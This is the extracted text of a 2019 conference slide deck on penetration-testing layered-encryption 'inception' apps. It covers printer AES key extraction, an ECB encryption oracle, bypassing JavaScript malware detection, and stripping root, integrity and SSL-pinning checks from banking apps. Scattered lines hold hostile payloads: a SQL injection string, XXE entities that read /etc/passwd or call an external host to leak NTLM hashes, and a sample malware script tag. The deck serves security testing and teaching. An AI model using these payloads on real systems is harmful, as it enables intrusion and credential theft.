SlideShare uma empresa Scribd logo
1 de 78
Baixar para ler offline
We need to go deeper
Testing inception apps
Jakub Kaluzny
CONFidence, June 2019
DevSecOps
B64:
dXNlcm5hbWUK=YWRtaW4K&c
GFzc3dvcmQK=YWJjCg%3d%3d
HTTP
username=admin&password=abc
HTTP
DAST scanner in
CI/CD pipeline
SQLi
Is it fixed?
Base64_decode(„YWJjCg==’ OR 1=1”)
JAKUB KALUZNY
• 10 years in IT & Security
• Threat modeling,
DevSecOps, penetration
tests
• Poland, Spain, Australia
• banking, fintech, law, airline,
entertainment, e-commerce
• Speaker at BlackHat,
HackInTheBox, ZeroNights
Who
What is this all about?
HTTP
username=admin&password=abc
HTTP
username=admin&password=abc
SSL
Wireshark
Protection against what?
Sniffing, Man-in-The-Middle
SQL Injection, cross-user access control, business logic
What is this all about?
dXNlcm5hbWUK=YWRtaW4K&c
GFzc3dvcmQK=YWJjCg%3d%3d
HTTP
username=admin&password=abc
HTTP
HTTP
username=admin&password=abc
SSL
SSL
Local HTTP proxy
Custom script
Wireshark
Inception apps
AES encrypted:
c6fa10bd98a6c4e778eac
Binary
protocol
SSL
Key exchange
during activation
Mobile app – obfuscated
Emulator and root/jailbreak detection
• Raising the bar:
• For attackers?
• For testers?
• Money:
• Scoping a test?
• Risk
• Attack surface coverage?
• Security level?
Why?
• Technical examples
• Business consequences
• And discuss pentesting processes in general
What
LET’S GET TO IT
Example 1
Enterprise printers – Pull Printing
PRINTERWORKSTATION
PRINT SERVER
https://www.slideshare.net/wojdwo/hitb-kaluzny-final
In the middle of printers
Printers down under – AES
• JAR on the SD card
• Encryption mechanism in the JAR
• Hardcoded static symmetric key - AES
Hidden gem – SD card
Example 1 – decompiled JAR
• JAR on the SD card
• Encryption mechanism in the JAR
• Hardcoded static symmetric key - AES
• It’s the same everywhere!
• No remote firmware update!
Example 1
Attack flow
Threat
actor
Crown
jewels
Sniff the communication
Get the SD card Extract the key
Apply
decryption
In the middle of printers - revisited
S
E
R
V
E
R
P
R
I
N
T
E
R
constant 263B
96B, “X” B, 128B
always different 64 B
many identical 16B blocks
HELLO
HELLO, CERTIFICATE
SESSION KEY
PostScript, ECB mode
ECB encryption mode for PostScript files
Each block encrypted separately
ECB is bad
https://en.wikipedia.org/wiki/ECB_mode
In the middle of printers - revisited
S
E
R
V
E
R
P
R
I
N
T
E
R
constant 263B
96B, “X” B, 128B
always different 64 B
many identical 16B blocks
HELLO
HELLO, CERTIFICATE
SESSION KEY
PostScript, ECB mode
Attack flow
Threat
actor
Crown
jewels
Sniff the communication
Communication
analysis
Decryption
script
Data extraction
Access to plaintext files, no access control
MORE
Web app, AES comms, no key access
HTTP
Action=buy&Product=137&name=Kaluzny
HTTP
magic_string=abcdef1234567890…
HTTP
magic_string=abcdef1234567890…
HTTP
msg=Hi%20Kaluzny&Price_for_you=1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
11b3215b7764e11fbff4c1db3aa73925
e479b31f1313d3c7bf78585f77f3f17d
c69bb9650a3bfb6e9137e218c7267da6
a57fcd28cc90574b00374cc42f224dd3
Magic string
magic_string=b0dc782f6bd9
acce9bc3e9c8317b05125bb51
d9cbc4bfa56d41d7db1489f9b
bcc2cc45f774773e8adde9c41
ecd62c5bc1faafa1d2553661c
8b83012f7e968d511b3215b77
64e11fbff4c1db3aa7325e479
b31f1313d3c7bf78585f77f3f
17dc69bb9650a3bfb6e9137e2
18c7267da6a57fcd28cc9074b
00374cc42f224dd3
magic_string=b0dc782f6bd9
acce9bc3e9c8317bb6e9137e2
18c7267da6a57fcd28cc9074b
00374cc42f224dd3’ OR 1=1
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
11b3215b7764e11fbff4c1db3aa73925
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Hi
Kaluznyaaaaaaa
aaaaaaaaaaaaaa
aaaaaaaaaaaaaa
aaaaaa, your
price is 1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Hi
Kaluznyaaaaaaa
aaaaaaaaaaaaaa
aaaaaaaaaaaaaa
aaaaaa, your
price is 1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Hi
aaaaaaaaaaaaaa
aKaluznyaaaaaa
aaaaaaaaaaa,
your price is
1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
a3c87d6b3905a779a5f1023bdf04ad2a „aluznyaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „aaaaaaaaaaaaaa&i”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aluznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
b1210bb98863ba5cd874014fb19fae70 „luznyaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
6334547c4ba2df81296b72e38a5309d8 „aaaaaaaaaaaaa&ip”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =luznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
5abfcd17d58fe4136232bfd7a1533f93 „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
880c5f38a4cfa7e003fe5f316294fe28 „aaaaa&ip=X.Y.Z.A”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
5655d4c01446a7aeb104cf298fe6b613 „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
1fa9f4fb1104af1afecd980bec3c8536 „&ip=X.Y.Z.A&user”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
Encryption Oracle
Hi
Kaluznyaaaaaaa
aaaaaaaaaaaaaa
aaaaaaX.Y.Z.A,
your price is
1500.50
B0dc782f6bd9acce9bc3e9c8317b0512 „action=buy&item”
5bb51d9cbc4bfa56d41d7db1489f9bbc „=137&price=1500”
c2cc45f774773e48adde9c41ecd62c5b „.50&name=Kaluzn”
c1faafa1d2553661c8b83012f7e968d5 „y&ip=X.Y.Z.A&us”
179762d5bba72ce4700aad2a96f5121d „er=admin&passwo”
e479b31f1313d3c7bf78585f77f3f17d „rd=s3cr3t&path=”
Encryption Oracle
031531894944dd25e457746a02f7eacf „&arbitrary=asd&&”
820cb29708da08d81cd8dd2ee1c459ed „chg=a&....&chg=b”
Web app, AES comms, no key access
HTTP
Action=buy&Product=137&name=Kaluzny
HTTP
magic_string=abcdef1234567890…
HTTP
magic_string=abcdef1234567890…
HTTP
msg=Hi%20Kaluzny&Price_for_you=1500.50
API
Attack flow
Threat
actor
Crown
jewels
Tamper with parameters
Communication
analysis
Encryption
oracle
Lateral
movement
Credentials would never be sent unencrypted
MITB MALWARE
DETECTION IN
JAVASCRIPT
MiTB malware - WebInjects
<title>Bank</title>
…
Password:
<input type=text>
<script src=//malware>
<title>Bank</title>
…
Password:
<input type=text>
MiTB malware detection in JS
<script
src=//antimalware>
<script src=//malware>
<title>Bank</title>
…
JS-based MiTB malware detection
MiTB malware detection in JavaScript
eval
Obfuscation – base64, hex
RSA
encryption
signatures
reasoning engine
Web Service
rsa public key
https://www.slideshare.net/wojdwo/bypassing-malware-detection-mechanisms-in-online-banking-confidence
@molejarka, @j_kaluzny
Attack flow
Threat
actor
Crown
jewels
Tamper with parameters
Deobfuscate JS Extract RSA keys
Decrypt
communication
MiTB malware detection in JS
<script
src=//antimalware>
<script src=//malware>
<title>Bank</title>
…
TESTING MOBILE
BANKING IN 2019
Mobile banking in early 2010s
OK
Hi, I want to send $5
Standard SSL
Attack flow – Android – inception level 1
Threat
actor
Crown
jewels
Tamper with parameters
Add local proxy CA
• Export CA from local proxy
• Push it to the device
• Intercept traffic
Androd – inception level 1
Mobile banking in early 2010s
OK
Hi, I want to send $5
SSL pinning
Modifying a hardcoded certificate:
• Unpack APK
• Change certificate in resources
• Pack the app, sign it
Attack flow – inception level 2
Attack flow – inception level 2
Threat
actor
Crown
jewels
Tamper with parameters
Bypass hardcoded
SSL pinning checks
Set the proxy
• Decompile APK to Smali code
• „Void” the pinning methods or
change the certificate:
• Find the interesting
methods
• Delete the code, leaving
„return-void” at the end
• Build it, sign it
Attack flow – inception level 2
Testing mobile banking in late 2010s, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
HTTP body encryption
HTTP body encryption
payload=e47bf2dcd90af0d3366f
4bacfe932ffae47bf2dcd90af0d33
SSL
HTTP
Testing mobile banking in late 2010s, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption
Attack flow – Android – 7 layers of inception
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin
• Decompile APK to Smali code
• „Void” the integrity checks
Attack flow – Android – inception level 1/7
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• Second root check runs a minute after the first!
Attack flow – Android – inception level 2/7
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
Attack flow – Android – inception level 3/7
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
Attack flow – Android – inception level 4/7
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
Attack flow – Android – inception level 5/7
Example 4 – mobile banking in 2019, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption
Example 4 – mobile banking in 2019, Poland
1c45a9eef01775077dac93add52595
The key will be 0000000000
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
• Develop a custom Burp plugin
Attack flow – Android – inception level 6/7
Burp plugin – „Deszyfrator”
@slawekja
Attack flow – Android – inception level 7/7
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin
You are in position
to start testing
SOAP – Simple Object Access Protocol
WCF BINARY XML - SOAP
TCP
START-TLS
Let’s call it tnSOAP – totally not SOAP
mitm_relay for START-TLS
[thick client] ----▶ [mitm_relay] ----▶ [destination server]
| ▲
▼ |
[local proxy] < Intercept and
| ▲ modify traffic here
▼ |
[dummy webserver]
https://github.com/jrmdev/mitm_relay
WCF data – python-wcfbin by ERNW
[jk@omega python-wcfbin-develop]$ python xml2wcf.py | hexdump -Cv
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
xmlns:m="http://www.example.org">
<soap:Header>
</soap:Header>
<soap:Body>
<m:GetStockPrice>
<m:StockName>GOOG</m:StockName>
</m:GetStockPrice>
</soap:Body>
</soap:Envelope>
00000000 43 04 73 6f 61 70 02 0b 04 73 6f 61 70 04 09 01 |C.soap...soap...|
00000010 6d 16 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 |m.http://www.exa|
00000020 6d 70 6c 65 2e 6f 72 67 43 04 73 6f 61 70 08 01 |mple.orgC.soap..|
00000030 43 04 73 6f 61 70 0e 6a 0d 47 65 74 53 74 6f 63 |C.soap.j.GetStoc|
00000040 6b 50 72 69 63 65 6a 09 53 74 6f 63 6b 4e 61 6d |kPricej.StockNam|
00000050 65 9f 03 18 e3 86 01 01 01 |e........|
00000059
Attack flow – tnSOAP
Threat
actor
Crown
jewels
Tamper with parameters
Intercept TCP
connection
MiTM on START-TLS Decapsulate WCF
Hardware
+ socat
mitm_relay python-wcfbin
+ few fixes
• <!ENTITY xxe SYSTEM „file:///etc/passwd”>
• XXE OOB over FTP
• <!ENTITY „abc” SYSTEM „file://securing.biz:445/”>
TCP -> START TLS -> WCF -> XML -> XXE -> NTLM
https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
Attack flow – tnSOAP
Threat
actor
Increased
attack
surface
Tamper with parameters
Intercept TCP
connection
MiTM on START-TLS Decapsulate WCF
Hardware
+ socat
mitm_relay python-wcfbin
+ few fixes
• Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Processes
Attack flow – Android – inception level 7/7
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin
You are in position
to start testing
• Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Summary
Protection against what?
Sniffing, Man-in-The-Middle, Malware
SQL Injection, cross-user access control, business logic
• Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Summary
Thank you!
Twitter: @j_kaluzny
Jakub.Kaluzny@securing.biz
MORE THAN
SECURITY TESTS.

Mais conteúdo relacionado

Semelhante a We need t go deeper - Testing inception apps.

Kong API Gateway
Kong API Gateway Kong API Gateway
Kong API Gateway Chris Mague
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesZuzannaKornecka
 
Security Testing by Ken De Souza
Security Testing by Ken De SouzaSecurity Testing by Ken De Souza
Security Testing by Ken De SouzaQA or the Highway
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
The Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect DataThe Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect DataAndy LoPresto
 
Creating Responsive Experiences
Creating Responsive ExperiencesCreating Responsive Experiences
Creating Responsive ExperiencesTim Kadlec
 
Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"IT Event
 
SCADA StrangeLove 2: We already know
SCADA StrangeLove 2:  We already knowSCADA StrangeLove 2:  We already know
SCADA StrangeLove 2: We already knowqqlan
 
Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?Charles Givre
 
Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015GregMefford
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Evolveum: IDM story for a growing company
Evolveum: IDM story for a growing companyEvolveum: IDM story for a growing company
Evolveum: IDM story for a growing companyEvolveum
 
Yahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user groupYahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user groupHadoop User Group
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloudrandomuserid
 
The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...Ken DeSouza
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
How to secure web applications
How to secure web applicationsHow to secure web applications
How to secure web applicationsMohammed A. Imran
 

Semelhante a We need t go deeper - Testing inception apps. (20)

Kong API Gateway
Kong API Gateway Kong API Gateway
Kong API Gateway
 
CQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slidesCQURE_BHAsia19_Paula_Januszkiewicz_slides
CQURE_BHAsia19_Paula_Januszkiewicz_slides
 
Security Testing by Ken De Souza
Security Testing by Ken De SouzaSecurity Testing by Ken De Souza
Security Testing by Ken De Souza
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
The Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect DataThe Thing About Protecting Data Is, You Have To Protect Data
The Thing About Protecting Data Is, You Have To Protect Data
 
Creating Responsive Experiences
Creating Responsive ExperiencesCreating Responsive Experiences
Creating Responsive Experiences
 
Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"Aleksey Bogachuk - "Offline Second"
Aleksey Bogachuk - "Offline Second"
 
SCADA StrangeLove 2: We already know
SCADA StrangeLove 2:  We already knowSCADA StrangeLove 2:  We already know
SCADA StrangeLove 2: We already know
 
Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?Strata NYC 2015 What does your smart device know about you?
Strata NYC 2015 What does your smart device know about you?
 
Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015Grokking Grok: Monitorama PDX 2015
Grokking Grok: Monitorama PDX 2015
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
 
Performance Risk Management
Performance Risk ManagementPerformance Risk Management
Performance Risk Management
 
Evolveum: IDM story for a growing company
Evolveum: IDM story for a growing companyEvolveum: IDM story for a growing company
Evolveum: IDM story for a growing company
 
Bulletproof
BulletproofBulletproof
Bulletproof
 
Mobile security
Mobile securityMobile security
Mobile security
 
Yahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user groupYahoo! Mail antispam - Bay area Hadoop user group
Yahoo! Mail antispam - Bay area Hadoop user group
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloud
 
The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...The bare minimum that you should know about web application security testing ...
The bare minimum that you should know about web application security testing ...
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
How to secure web applications
How to secure web applicationsHow to secure web applications
How to secure web applications
 

Mais de SecuRing

Developer in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4DevelopersDeveloper in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4DevelopersSecuRing
 
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!SecuRing
 
Developer in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON NameDeveloper in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON NameSecuRing
 
Is persistency on serverless even possible?!
Is persistency on serverless even possible?!Is persistency on serverless even possible?!
Is persistency on serverless even possible?!SecuRing
 
What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!SecuRing
 
0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS EnvironmentsSecuRing
 
Developer in a digital crosshair, 2022 edition
Developer in a digital crosshair, 2022 editionDeveloper in a digital crosshair, 2022 edition
Developer in a digital crosshair, 2022 editionSecuRing
 
20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy Mechanisms20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy MechanismsSecuRing
 
How secure are webinar platforms?
How secure are webinar platforms?How secure are webinar platforms?
How secure are webinar platforms?SecuRing
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy MechanismsSecuRing
 
Serverless security: attack & defense
 Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defenseSecuRing
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsSecuRing
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
 
Let's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleSecuRing
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainSecuRing
 
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standardsWeb Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standardsSecuRing
 
Budowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOSBudowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOSSecuRing
 
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsSecuRing
 
Artificial Intelligence – a buzzword, new era of IT or new threats?
Artificial Intelligence – a buzzword, new era of IT or new threats?Artificial Intelligence – a buzzword, new era of IT or new threats?
Artificial Intelligence – a buzzword, new era of IT or new threats?SecuRing
 

Mais de SecuRing (20)

Developer in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4DevelopersDeveloper in a digital crosshair, 2023 edition - 4Developers
Developer in a digital crosshair, 2023 edition - 4Developers
 
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!Developer in a digital crosshair, 2022 edition - Oh My H@ck!
Developer in a digital crosshair, 2022 edition - Oh My H@ck!
 
Developer in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON NameDeveloper in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON Name
 
Is persistency on serverless even possible?!
Is persistency on serverless even possible?!Is persistency on serverless even possible?!
Is persistency on serverless even possible?!
 
What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!What happens on your Mac, stays on Apple’s iCloud?!
What happens on your Mac, stays on Apple’s iCloud?!
 
0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments0-Day Up Your Sleeve - Attacking macOS Environments
0-Day Up Your Sleeve - Attacking macOS Environments
 
Developer in a digital crosshair, 2022 edition
Developer in a digital crosshair, 2022 editionDeveloper in a digital crosshair, 2022 edition
Developer in a digital crosshair, 2022 edition
 
20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy Mechanisms20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy Mechanisms
 
How secure are webinar platforms?
How secure are webinar platforms?How secure are webinar platforms?
How secure are webinar platforms?
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
